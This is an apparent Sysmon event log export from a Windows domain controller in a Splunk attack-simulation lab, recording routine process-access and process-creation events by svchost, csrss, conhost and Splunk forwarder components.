14:20:19.978{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA2C-6299-4D07-000000005F02}3376C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205720Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:19.978{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA2C-6299-4D07-000000005F02}3376C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205719Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:19.978{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA2C-6299-4D07-000000005F02}3376C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205718Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:19.978{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA2C-6299-4D07-000000005F02}3376C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205717Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:19.978{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA2C-6299-4D07-000000005F02}3376C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205716Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:19.978{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA2C-6299-4D07-000000005F02}3376C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205715Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:19.978{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA2C-6299-4D07-000000005F02}3376C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205714Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:19.978{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA2C-6299-4D07-000000005F02}3376C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205713Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:19.978{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA2C-6299-4D07-000000005F02}3376C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205712Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:19.978{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA2C-6299-4D07-000000005F02}3376C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205711Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:19.978{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA2C-6299-4D07-000000005F02}3376C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205710Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:19.978{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA2C-6299-4D07-000000005F02}3376C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205709Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:19.978{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA2C-6299-4D07-000000005F02}3376C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205708Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:19.978{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA2C-6299-4D07-000000005F02}3376C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205707Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:19.978{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA2C-6299-4D07-000000005F02}3376C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205706Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:19.978{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA2C-6299-4D07-000000005F02}3376C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205705Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:19.978{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA2C-6299-4D07-000000005F02}3376C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205704Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:19.978{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA2C-6299-4D07-000000005F02}3376C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205703Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:19.777{2E1864BB-E1BE-6299-AB00-000000005F02}92876C:\Windows\system32\conhost.exe{2E1864BB-18A3-629A-5E42-000000005F02}5792C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205702Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:19.777{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205701Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:19.777{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205700Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:19.777{2E1864BB-E13C-6299-0500-000000005F02}416780C:\Windows\system32\csrss.exe{2E1864BB-18A3-629A-5E42-000000005F02}5792C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000205699Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:19.777{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205698Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:19.777{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205697Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:19.777{2E1864BB-E1BD-6299-A700-000000005F02}47004496C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2E1864BB-18A3-629A-5E42-000000005F02}5792C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000205696Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:19.779{2E1864BB-18A3-629A-5E42-000000005F02}5792C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2E1864BB-E13C-6299-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000205695Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:19.531{2E1864BB-18A3-629A-5D42-000000005F02}45805432C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+610325|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60fe56|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60943|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60f97|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+9e7f20|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205694Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:19.277{2E1864BB-E1BE-6299-AB00-000000005F02}92876C:\Windows\system32\conhost.exe{2E1864BB-18A3-629A-5D42-000000005F02}4580C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205693Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:19.277{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205692Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:19.277{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205691Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 